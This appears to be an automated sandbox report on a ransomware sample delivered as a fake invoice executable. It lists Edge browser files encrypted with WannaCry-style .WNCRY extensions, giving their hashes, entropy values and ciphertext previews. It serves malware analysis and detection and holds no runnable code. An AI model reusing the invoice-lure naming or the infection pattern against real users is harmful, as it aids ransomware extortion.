                                                          Reputation:unknown
                                                          Preview:WANACRY!......r!.zN.]..'1K..Y..=.D.w..#...^..l*..?.6%.x.x..\E-5._.`n..Q......f...@i.X...(&.{.\....e.=i..$^.i%..8....M.:..x..D[X..+0....m..+?.).JhC......{0t.d%l|):H..O......v...Z ........x...I.G.z.&....L.=.B...Q.%.ZM}*.._.y......Z+M.3.d.4.../@.7.......k..y...._........d.........rV.?.P......:.......}...[.'.^..^...Yg...G..Pj.....h.9../.D.n>pFT.o...bJ..j.r^.P..*L2.K..Duzi..5..}l..C*E=}..(...&!..H.7.!0.y.HF.s.m.~w;....\.J.!...DH....!9.....J..).k....d.....d..."x.*..1..*..b..A.....m3........wJ.....)..mv...l.w.\..d.......~2.a...,..CAPd.....1)HY...Y../.....y..ca...(.Sy.s..*......K.f{...E.<.........9.'......l3Tyz.(|.Sjd.C)..N.v.1mu..e2.S..K..........V.qn.....d...x...s......t...y.0.n....G.$i..../V5..9.T..:...c.b..?...O.....:/..Z.f......}K.jX.....D..v3..C...3.I7...F%.e.....~.9c..3....,.X..BH...<Z...(...b..0K....q:.2..v+d.\.^.O...mcG..}.9[.g.....d.^..k...ft.....A..2..H..$..._.l.2..S.....h#3.......X...oV.5Rh*..q.n.W.r.e!f..|.....ar.<..."..m.9.?qj..x..../7...

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Travel\1.0.0.2\extraction.js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):5608
                                                          Entropy (8bit):7.964312544618281
                                                          Encrypted:false
                                                          SSDEEP:96:oo6QSXroxji7AOtY2WnkvvsCAmPX2ubCWSvr5aXq0Nezkr3Gs7cHMwuxD8l:ikxmsOtYlk3ASGDWyr5g5NcHMwux4
                                                          MD5:EF285240B08DABC758ACA38B39EE2270
                                                          SHA1:E3531B8A24B58D0B4C7201E07DA0025A5A9928A4
                                                          SHA-256:A0D28D3129DED1911E07B88ECE18D48A29A230249F00AAD5805FDDF7D41E77ED
                                                          SHA-512:300D70B50236D3DDCFB0C807212159E194007F614AF4A0C407C882C97BB078356F390C581B646DE4BE4B8754BF2917BC8037D9C803A65E33C8E85E64583CAC2A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....'1.......^t.A#q..z....z..&x@.....y....t.j.*Q...f.[I.7.ibV...8..T........I..H..ym.d..'.^.ax./s....M...|.I...1.^.#Z..K(m{..Y.y.B.Q....s.F(..@."%F..X......S%.|.C.-.e..D`.....Bm.0..@.1O..SQ........2".B....sW+-m..U........HK...0.....m..z..~....lI....4..............3.C..%.7...?...[..W..{l..x..)...K;/X.TB?...Ko..oG..........4...x........w.Q..d..1G...K.\x3.....V.}...H.^..)..3..X..?5..c,..pC`.,....E3K%....|.b...n7........s..m.r....u..hX.......X..KKRK..f..t]...d.[P...%A..L(..z"..W...........s..Q.@..Mn......$.(0..+.~J.*.4............D..r=;..`.....5m.... ?V...MM.U&..].....T5u.+..'}F...Z..N7.....O.jm.W...n.....|U.z.N7..S.)..-....Z..Kj2.w.,T.....=#.....KW......1.F..@m......|-....f.5.5........uPIL...;.....S...)....s..9p.#e.i......$.$.}.C.X(.....}....}..P.P.c.....O..x\..f..L.N...-\..?......8l.8.0...........V......*_%.....h...}..h.H|..bA.-@e..B..K...{..2D...I.M.....1+].M.......x..V.*<....L..:.g. ..2._.|n# ....[.i... Ah...]jRYh..4.jb

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Travel\1.0.0.2\extraction.js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):5608
                                                          Entropy (8bit):7.964312544618281
                                                          Encrypted:false
                                                          SSDEEP:96:oo6QSXroxji7AOtY2WnkvvsCAmPX2ubCWSvr5aXq0Nezkr3Gs7cHMwuxD8l:ikxmsOtYlk3ASGDWyr5g5NcHMwux4
                                                          MD5:EF285240B08DABC758ACA38B39EE2270
                                                          SHA1:E3531B8A24B58D0B4C7201E07DA0025A5A9928A4
                                                          SHA-256:A0D28D3129DED1911E07B88ECE18D48A29A230249F00AAD5805FDDF7D41E77ED
                                                          SHA-512:300D70B50236D3DDCFB0C807212159E194007F614AF4A0C407C882C97BB078356F390C581B646DE4BE4B8754BF2917BC8037D9C803A65E33C8E85E64583CAC2A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....'1.......^t.A#q..z....z..&x@.....y....t.j.*Q...f.[I.7.ibV...8..T........I..H..ym.d..'.^.ax./s....M...|.I...1.^.#Z..K(m{..Y.y.B.Q....s.F(..@."%F..X......S%.|.C.-.e..D`.....Bm.0..@.1O..SQ........2".B....sW+-m..U........HK...0.....m..z..~....lI....4..............3.C..%.7...?...[..W..{l..x..)...K;/X.TB?...Ko..oG..........4...x........w.Q..d..1G...K.\x3.....V.}...H.^..)..3..X..?5..c,..pC`.,....E3K%....|.b...n7........s..m.r....u..hX.......X..KKRK..f..t]...d.[P...%A..L(..z"..W...........s..Q.@..Mn......$.(0..+.~J.*.4............D..r=;..`.....5m.... ?V...MM.U&..].....T5u.+..'}F...Z..N7.....O.jm.W...n.....|U.z.N7..S.)..-....Z..Kj2.w.,T.....=#.....KW......1.F..@m......|-....f.5.5........uPIL...;.....S...)....s..9p.#e.i......$.$.}.C.X(.....}....}..P.P.c.....O..x\..f..L.N...-\..?......8l.8.0...........V......*_%.....h...}..h.H|..bA.-@e..B..K...{..2D...I.M.....1+].M.......x..V.*<....L..:.g. ..2._.|n# ....[.i... Ah...]jRYh..4.jb

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Travel\1.0.0.2\travel-facilitated-booking-bing.js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2696
                                                          Entropy (8bit):7.934982023386476
                                                          Encrypted:false
                                                          SSDEEP:48:bkOhnX7o0FsxWLb2bNJcrvycM71+Unk6eb+VUE9ui7nwLj8QO+ym:oOp7o0FsxuSbNJcrvyN5+mk6u+VjnwnJ
                                                          MD5:D9EB6D11E75AD0818C354437DF474441
                                                          SHA1:9C29ACE87C06FB8A3D0DF74AF37F6024EF40A49A
                                                          SHA-256:ADBFE12BA425F56DA19F03DDED61E25C2DDABAD15F498EA7A8593A16421E0E88
                                                          SHA-512:9390456B2143A22436203E047F13CD319A4471BE502A0D77A0DD813224F4F0E23399A9CF167C9B59F6F83DDEDA6E2DD910C206793D35D22620A142614743B5FC
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....$.S..}.......U.v........&...&."...X.9r...s.@.).g.......;......I.......=........3...=.x.]c ...3hLa....OQ.....o.U..P0.`......i..#....E..)...t.?.2.."..*,c.w.O.0t\q:.#e&..<.T.Z.<....F.s.. ...R...........C...9.`.M.oq|........U.cj.h...o."I9/..XVp.ZW.P:-....g........3.....|...lb".h..P.T.l.{.?..-w.^....eJ.D..h.M.(.<zE.g..z....t..L..:.....-.u...nC....F.{#....dz..l/KS..$l..\.l`..1.rw...(....Y.z..wE..\ t......T............E...F2....4P`.:H..(j7....$WP.`.I.L...7d."\....G..PP.w$..!..H.D.M..BE..Q....h.......-..../.......\....q.....pH.r@MA.ze82D.P......Kv.......i..XH......(...O`........^. |.F..:9..[y.2T..Q....Zh[.......6..N.Nwl.6.......i/........P...._.....;...T0X..s1.Z>...WTA.l5..g.o.S.nr3.5J..`.f.@.Q.d...C.jW=S...x..+e;.'...p.J.]l.............W..V.s.G.>.m!..B.......8J..........V..3...z.X...r.....f.g......x.C.........|4R.l..f..oLI.....edK.Z.y..-7S..cF..S..d.l...5..t..K..o..&..C..=..1....!.F....f+....dc.7J...Z."=...{M1.....4...-J.....F.=sd

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Travel\1.0.0.2\travel-facilitated-booking-bing.js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2696
                                                          Entropy (8bit):7.934982023386476
                                                          Encrypted:false
                                                          SSDEEP:48:bkOhnX7o0FsxWLb2bNJcrvycM71+Unk6eb+VUE9ui7nwLj8QO+ym:oOp7o0FsxuSbNJcrvyN5+mk6u+VjnwnJ
                                                          MD5:D9EB6D11E75AD0818C354437DF474441
                                                          SHA1:9C29ACE87C06FB8A3D0DF74AF37F6024EF40A49A
                                                          SHA-256:ADBFE12BA425F56DA19F03DDED61E25C2DDABAD15F498EA7A8593A16421E0E88
                                                          SHA-512:9390456B2143A22436203E047F13CD319A4471BE502A0D77A0DD813224F4F0E23399A9CF167C9B59F6F83DDEDA6E2DD910C206793D35D22620A142614743B5FC
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....$.S..}.......U.v........&...&."...X.9r...s.@.).g.......;......I.......=........3...=.x.]c ...3hLa....OQ.....o.U..P0.`......i..#....E..)...t.?.2.."..*,c.w.O.0t\q:.#e&..<.T.Z.<....F.s.. ...R...........C...9.`.M.oq|........U.cj.h...o."I9/..XVp.ZW.P:-....g........3.....|...lb".h..P.T.l.{.?..-w.^....eJ.D..h.M.(.<zE.g..z....t..L..:.....-.u...nC....F.{#....dz..l/KS..$l..\.l`..1.rw...(....Y.z..wE..\ t......T............E...F2....4P`.:H..(j7....$WP.`.I.L...7d."\....G..PP.w$..!..H.D.M..BE..Q....h.......-..../.......\....q.....pH.r@MA.ze82D.P......Kv.......i..XH......(...O`........^. |.F..:9..[y.2T..Q....Zh[.......6..N.Nwl.6.......i/........P...._.....;...T0X..s1.Z>...WTA.l5..g.o.S.nr3.5J..`.f.@.Q.d...C.jW=S...x..+e;.'...p.J.]l.............W..V.s.G.>.m!..B.......8J..........V..3...z.X...r.....f.g......x.C.........|4R.l..f..oLI.....edK.Z.y..-7S..cF..S..d.l...5..t..K..o..&..C..=..1....!.F....f+....dc.7J...Z."=...{M1.....4...-J.....F.=sd

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Travel\1.0.0.2\travel-facilitated-booking-kayak.js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):6136
                                                          Entropy (8bit):7.969707327113116
                                                          Encrypted:false
                                                          SSDEEP:96:ojonc9M93gxPUg8QmrrKWzGPDgvNcnVin1SUp5smrEg47jrivDDntaJNaHE0haIU:Xd4l8nPvQgH1SUTsQperivDDwJOgIU
                                                          MD5:F0FE1F3C621E554990C4EF13E634B805
                                                          SHA1:05C143F3984AE540EB2348C626E7B91A9FB10E3A
                                                          SHA-256:BF893C800322A0AE7FE1196250B0281880AF3A201F2DA7576D5DF98B7D4455A2
                                                          SHA-512:9FA1DEAD2862CB522A625A32702DBC0827F99503A6AC833EF38C541F5C68F19C6A529246A6E2EC0F3DB7A655C10401568ECB31410A5929B334AC3C2EEEF8B2AA
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....r.0..g.1........E.........Tl...G..KJ...;..#.... ^...._..6.YHh...`.+d..S.....;W..l1..0,.#k..N....mM.I.R..d.b.......Q.".~X...+:..^....7.^. ..6.......1.....m..\...D%.L./8....0..D..vs..)..%".G.........jZ)..~m....C.i%.}E.1.Uz.Yu.a|{.>m...p....~.B.............Y,...q..|....z....k*.1.oR4..e.........[..*...c.Ry.<..2...^..d.V9....Ut^.~..R.rQb..|P.[.F...e...7.Fm.<..H.2[...e..S...............-jk....>(z.0u>.....V.O..&X."t....i./".T.e;.2.G2...[.ky..QuK.%T..|+}YP.).v.`...G....CM..{.(...Ln8.c^.~."5.:...q.Z.'..5..}S..d....2?...7.P;.....ynR....o.. )7.^)..4s....Aq..t.*"C....2....{Y...e.=.......t..<.;.......>.v...........v.S......l...T.p..l4...@?..yo)...>;.T.....+H...S.hZep.~.P4G.....[........p.u..t.gF..3._..VJ.R....[.1A.k..Zy.G.&.L..cs..4t.6........H.....>..k... .J.S.Km0.........2..T......'.k.......f.R..>[Z.klU9...B\((.V..AY...5...].0...k....-}..3Y.+.cK.BcE....u...... ..QP..P...p.<....$w.."t...x+|.3g!>.m...[..].c...^W..Zse. ..U...wv.....;.Z

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Travel\1.0.0.2\travel-facilitated-booking-kayak.js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):6136
                                                          Entropy (8bit):7.969707327113116
                                                          Encrypted:false
                                                          SSDEEP:96:ojonc9M93gxPUg8QmrrKWzGPDgvNcnVin1SUp5smrEg47jrivDDntaJNaHE0haIU:Xd4l8nPvQgH1SUTsQperivDDwJOgIU
                                                          MD5:F0FE1F3C621E554990C4EF13E634B805
                                                          SHA1:05C143F3984AE540EB2348C626E7B91A9FB10E3A
                                                          SHA-256:BF893C800322A0AE7FE1196250B0281880AF3A201F2DA7576D5DF98B7D4455A2
                                                          SHA-512:9FA1DEAD2862CB522A625A32702DBC0827F99503A6AC833EF38C541F5C68F19C6A529246A6E2EC0F3DB7A655C10401568ECB31410A5929B334AC3C2EEEF8B2AA
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....r.0..g.1........E.........Tl...G..KJ...;..#.... ^...._..6.YHh...`.+d..S.....;W..l1..0,.#k..N....mM.I.R..d.b.......Q.".~X...+:..^....7.^. ..6.......1.....m..\...D%.L./8....0..D..vs..)..%".G.........jZ)..~m....C.i%.}E.1.Uz.Yu.a|{.>m...p....~.B.............Y,...q..|....z....k*.1.oR4..e.........[..*...c.Ry.<..2...^..d.V9....Ut^.~..R.rQb..|P.[.F...e...7.Fm.<..H.2[...e..S...............-jk....>(z.0u>.....V.O..&X."t....i./".T.e;.2.G2...[.ky..QuK.%T..|+}YP.).v.`...G....CM..{.(...Ln8.c^.~."5.:...q.Z.'..5..}S..d....2?...7.P;.....ynR....o.. )7.^)..4s....Aq..t.*"C....2....{Y...e.=.......t..<.;.......>.v...........v.S......l...T.p..l4...@?..yo)...>;.T.....+H...S.hZep.~.P4G.....[........p.u..t.gF..3._..VJ.R....[.1A.k..Zy.G.&.L..cs..4t.6........H.....>..k... .J.S.Km0.........2..T......'.k.......f.R..>[Z.klU9...B\((.V..AY...5...].0...k....-}..3Y.+.cK.BcE....u...... ..QP..P...p.<....$w.."t...x+|.3g!>.m...[..].c...^W..Zse. ..U...wv.....;.Z

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Mini-Wallet\miniwallet.bundle.js.LICENSE.txt.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):584
                                                          Entropy (8bit):7.636606198293026
                                                          Encrypted:false
                                                          SSDEEP:12:bkEMtI1BVkIe9F0Fi4yPkd0Q/xJ7FJk/U04uG/nNvvajM6nV0xMmy/dcJ:bkFtI1BVkIe9FCJyPunc/UBuG/NajM6m
                                                          MD5:39A60BD22ABE7AFFD59DF6EC89CBE6F4
                                                          SHA1:84478765800154CE057DB944E999A9DFB69C9658
                                                          SHA-256:BE5B3A2CAFF1616D2DB4E5A1CD04A66005388F39AC8B43E4ABFB235C74649F62
                                                          SHA-512:7509E0FCD166CCC70E4458D99D925734F0F226D986BF9A0CA3C0596AB6C54CE7E32D230C0D3E658E3681C4A0BD8E56D33B29CABC047205EC4911539155D6A966
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....O.G:e.XO...rJ5.t!?...........8.......tFSQ..>J...<.b..8&..G..90.[7........0a..gurB{.@..C.-JB%...y.x(...p.Vt..'.l......VW.[G<.c...(...@.F..J.2........3re....9Py.dz.83...=....s..04~.v.b&x.#;.Q.5...H-...^..DlrRH.6......."R...p...N....u.w..........<.3.....'.......2..........H............I.R...<.U.5...9.rPX5.:../.....p.....v.g.HDa.3}.....?..qP...8.g..A.].9:c..X.Dt...|...R...d..N...xC...z........]9;..%...5...B.1.......u..>.._..?.....U.4...*.IT....}..?...V3B.%....Yh..e.1...s~.8.e..4...M.<TxY..IK..v^..Ri.?.{......b.. N n.k.?.I.TY.leG.KN..f.6........^Sq.}'

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Mini-Wallet\miniwallet.bundle.js.LICENSE.txt.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):584
                                                          Entropy (8bit):7.636606198293026
                                                          Encrypted:false
                                                          SSDEEP:12:bkEMtI1BVkIe9F0Fi4yPkd0Q/xJ7FJk/U04uG/nNvvajM6nV0xMmy/dcJ:bkFtI1BVkIe9FCJyPunc/UBuG/NajM6m
                                                          MD5:39A60BD22ABE7AFFD59DF6EC89CBE6F4
                                                          SHA1:84478765800154CE057DB944E999A9DFB69C9658
                                                          SHA-256:BE5B3A2CAFF1616D2DB4E5A1CD04A66005388F39AC8B43E4ABFB235C74649F62
                                                          SHA-512:7509E0FCD166CCC70E4458D99D925734F0F226D986BF9A0CA3C0596AB6C54CE7E32D230C0D3E658E3681C4A0BD8E56D33B29CABC047205EC4911539155D6A966
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....O.G:e.XO...rJ5.t!?...........8.......tFSQ..>J...<.b..8&..G..90.[7........0a..gurB{.@..C.-JB%...y.x(...p.Vt..'.l......VW.[G<.c...(...@.F..J.2........3re....9Py.dz.83...=....s..04~.v.b&x.#;.Q.5...H-...^..DlrRH.6......."R...p...N....u.w..........<.3.....'.......2..........H............I.R...<.U.5...9.rPX5.:../.....p.....v.g.HDa.3}.....?..qP...8.g..A.].9:c..X.Dt...|...R...d..N...xC...z........]9;..%...5...B.1.......u..>.._..?.....U.4...*.IT....}..?...V3B.%....Yh..e.1...s~.8.e..4...M.<TxY..IK..v^..Ri.?.{......b.. N n.k.?.I.TY.leG.KN..f.6........^Sq.}'

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Mini-Wallet\miniwallet.bundle.js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):363208
                                                          Entropy (8bit):7.999471948074989
                                                          Encrypted:true
                                                          SSDEEP:6144:QvDliW+QmMEqeK0/V/D/L/75yI7LIHsH3f6DhM6QK5quPfPTgIjkz20E:9W+Qmqeb/DPYPHsH3f6DhMafjkiB
                                                          MD5:5D089BF3A02E89C540D902F6140F8023
                                                          SHA1:975631BBF46AC89EBC869FF8E8228112CAD25364
                                                          SHA-256:DB86B94C1E0A6C5E046100E7541749D85ABB8D3807016B0924A10EC42BE40291
                                                          SHA-512:DE1592CA08CB5739A3240339CFC74FCDDC14F5E6981A41BFE956AC403FC643A35A0F516C16948697A726516B325C8A39A041B5CE70C7CEBBA7A32FB6EA0A9521
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!......DFX.......J&.n.d.........4....g.68C..9...^.i.kC.#..K..B...3..x...T..8..b../A....p..E5...9..0.!.$.Rc.o...nw......h...M.U..V@..U.slG......#i....Z........pv....+#.SOw.}..."W....v.H.3..a.:...u).x.J>.6...._e........B8..!.......h...i?N..Ms...|..............(..(`..s..j?&.)k...@.R..........|1...Z...T....M..PT/.c*%..u...MV...E...q,@O........B......B..5.".."..cf....P(.....(P....S....%.Sg.`....{.D....d..gd.)[.b?}..]Iv.0.;R..A.Gn.e#s..WG.##8?.Q.....U..f....n.t...&..o)..#.N`qr..,.H....U......r.[..9.c+K`...6G......{..P.3...D..y...L.v...cT.........Qt...q6..t..M.u...U.....".W:.io..oin...Q..9xk....x...i..m...B.)f....f..z........w...O.pQ7..}..l7mT;...2+.V[..bhH. .........2n...z..U......2B....m.\..w4......44g{{.(.<Wo.q.;.<r.....3..~..Q..G:!|..^.8.U...!muZ]..d....=LM...*Q1..).!`.U. ..3.oZ.g5.V./O.x..F..m..j:hi.."...Q7kg......{..".t..EU.b^-...6.E..../.xn...5.....*.CW7..R........-..P.g(Y...0A.."f_.*.........{../..E"!j.U{.......R[h5..VR2C..;..Iv.._

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Mini-Wallet\miniwallet.bundle.js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):363208
                                                          Entropy (8bit):7.999471948074989
                                                          Encrypted:true
                                                          SSDEEP:6144:QvDliW+QmMEqeK0/V/D/L/75yI7LIHsH3f6DhM6QK5quPfPTgIjkz20E:9W+Qmqeb/DPYPHsH3f6DhMafjkiB
                                                          MD5:5D089BF3A02E89C540D902F6140F8023
                                                          SHA1:975631BBF46AC89EBC869FF8E8228112CAD25364
                                                          SHA-256:DB86B94C1E0A6C5E046100E7541749D85ABB8D3807016B0924A10EC42BE40291
                                                          SHA-512:DE1592CA08CB5739A3240339CFC74FCDDC14F5E6981A41BFE956AC403FC643A35A0F516C16948697A726516B325C8A39A041B5CE70C7CEBBA7A32FB6EA0A9521
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!......DFX.......J&.n.d.........4....g.68C..9...^.i.kC.#..K..B...3..x...T..8..b../A....p..E5...9..0.!.$.Rc.o...nw......h...M.U..V@..U.slG......#i....Z........pv....+#.SOw.}..."W....v.H.3..a.:...u).x.J>.6...._e........B8..!.......h...i?N..Ms...|..............(..(`..s..j?&.)k...@.R..........|1...Z...T....M..PT/.c*%..u...MV...E...q,@O........B......B..5.".."..cf....P(.....(P....S....%.Sg.`....{.D....d..gd.)[.b?}..]Iv.0.;R..A.Gn.e#s..WG.##8?.Q.....U..f....n.t...&..o)..#.N`qr..,.H....U......r.[..9.c+K`...6G......{..P.3...D..y...L.v...cT.........Qt...q6..t..M.u...U.....".W:.io..oin...Q..9xk....x...i..m...B.)f....f..z........w...O.pQ7..}..l7mT;...2+.V[..bhH. .........2n...z..U......2B....m.\..w4......44g{{.(.<Wo.q.;.<r.....3..~..Q..G:!|..^.8.U...!muZ]..d....=LM...*Q1..).!`.U. ..3.oZ.g5.V./O.x..F..m..j:hi.."...Q7kg......{..".t..EU.b^-...6.E..../.xn...5.....*.CW7..R........-..P.g(Y...0A.."f_.*.........{../..E"!j.U{.......R[h5..VR2C..;..Iv.._

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Mini-Wallet\shimmer.js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1336
                                                          Entropy (8bit):7.837561438059522
                                                          Encrypted:false
                                                          SSDEEP:24:bkQhka4Z8KLy0RwJP5S4Gzk4uHo4oZsepaj8+qII6Ttq4NW3OrFjtq3z:bkXHZVgP5R4kbomDFqIImwOrFj8z
                                                          MD5:F1B08092CA7BD33A815B784758D6167A
                                                          SHA1:5C45244BE771CF7D1DC845095BE0F38C37A82E11
                                                          SHA-256:B41522B32FB2E29610099964CF9AC67BFD1C12DE171D69DC5C55AFBCE3FBB5BB
                                                          SHA-512:0521E6FE9EDB0885AA590B55EC44DF7D2AE98BBC270A595DA607860D756D0F07CE03CC5E7B35F349F6F18EA9AF15871B43F3866D3BA1C58B22469B498B597381
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....j0;8........W....D..ar.L...3..M!b.\.H.....!.v..9>..'z?^w$.1...:{..r.4......$x6....U...<...R...G.8..ZR+6.. .x/..Z.g.4k.....2..23U..R.z.....]7-..-.h.n.0u.T.'H.t.(..M,.....3.....Ed..6.|=.......Y/..y).]:-...3.f./....~..O`l....A.T9.s{..%..3r................!*.......M.M.ubr.<...A.. ......|....+..,.........?....._...w.j.S.....hX8.c....tI...@.9.{. ......T. [..gA......4..b.[......PZ.....v...#M...1.m..c...d.M<..u..G).\2|o.Y...c...H3.E3....cm.a...-.f.'....0.%..`.....y...aW..O..KR...?.....3....X...&...W.....V.....[D.s.a....hsq..0.>4..^Y..!....E>.q...6..c.mW.6..U.NJ..X..ij<..N^.t.L...IaJ.A. -9i...mG.......A.:...0q.....8H.)..=.[..5b...RL.....0.s...V..aw.j..+..l._j....<.......#28....O3I..;..>c.~..~()8.P|o.v......p ....>eyN...:t\'.../.. .].BZ.N_P)c.Rc....QS......@...M.....9k..6....O..n..Q..O.N.S....r#(r......0.U%.Sj.bC..U.i<.....-...U 6.....e.)d.f....*...8..,.k...C..2.h..H.p`+_.t0U.aO.;u....J.....d...&.>..t$q...N,Tbm..E....:.

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Mini-Wallet\shimmer.js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1336
                                                          Entropy (8bit):7.837561438059522
                                                          Encrypted:false
                                                          SSDEEP:24:bkQhka4Z8KLy0RwJP5S4Gzk4uHo4oZsepaj8+qII6Ttq4NW3OrFjtq3z:bkXHZVgP5R4kbomDFqIImwOrFj8z
                                                          MD5:F1B08092CA7BD33A815B784758D6167A
                                                          SHA1:5C45244BE771CF7D1DC845095BE0F38C37A82E11
                                                          SHA-256:B41522B32FB2E29610099964CF9AC67BFD1C12DE171D69DC5C55AFBCE3FBB5BB
                                                          SHA-512:0521E6FE9EDB0885AA590B55EC44DF7D2AE98BBC270A595DA607860D756D0F07CE03CC5E7B35F349F6F18EA9AF15871B43F3866D3BA1C58B22469B498B597381
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....j0;8........W....D..ar.L...3..M!b.\.H.....!.v..9>..'z?^w$.1...:{..r.4......$x6....U...<...R...G.8..ZR+6.. .x/..Z.g.4k.....2..23U..R.z.....]7-..-.h.n.0u.T.'H.t.(..M,.....3.....Ed..6.|=.......Y/..y).]:-...3.f./....~..O`l....A.T9.s{..%..3r................!*.......M.M.ubr.<...A.. ......|....+..,.........?....._...w.j.S.....hX8.c....tI...@.9.{. ......T. [..gA......4..b.[......PZ.....v...#M...1.m..c...d.M<..u..G).\2|o.Y...c...H3.E3....cm.a...-.f.'....0.%..`.....y...aW..O..KR...?.....3....X...&...W.....V.....[D.s.a....hsq..0.>4..^Y..!....E>.q...6..c.mW.6..U.NJ..X..ij<..N^.t.L...IaJ.A. -9i...mG.......A.:...0q.....8H.)..=.[..5b...RL.....0.s...V..aw.j..+..l._j....<.......#28....O3I..;..>c.~..~()8.P|o.v......p ....>eyN...:t\'.../.. .].BZ.N_P)c.Rc....QS......@...M.....9k..6....O..n..Q..O.N.S....r#(r......0.U%.Sj.bC..U.i<.....-...U 6.....e.)d.f....*...8..,.k...C..2.h..H.p`+_.t0U.aO.;u....J.....d...&.>..t$q...N,Tbm..E....:.

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Notification\notification.bundle.js.LICENSE.txt.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1608
                                                          Entropy (8bit):7.852201060571658
                                                          Encrypted:false
                                                          SSDEEP:48:bkXsSKOFblAVhkUtd843OnpfTgLs36crMMUm2AMTsEXdNW:oTPFb0hkUhe536crSmpMB0
                                                          MD5:DD39077E7DF9F2F823EB186B06FD82B4
                                                          SHA1:762272B3B490A6FE3642455D268661E4F6840478
                                                          SHA-256:210CD51B28340658B184208A0E3FC0E4FEEC99C897A4DBE5280FC5B2339FEA10
                                                          SHA-512:FB46BC1348AFC322B297757C9E9D1B98120E0180EF923F6C1386224E67D7F65980B12D7BDCE1C41D8833EAD815EE702FCBA9892BD928EA8263F92B41DD0558FC
                                                          Malicious:false
                                                          Reputation:unknown
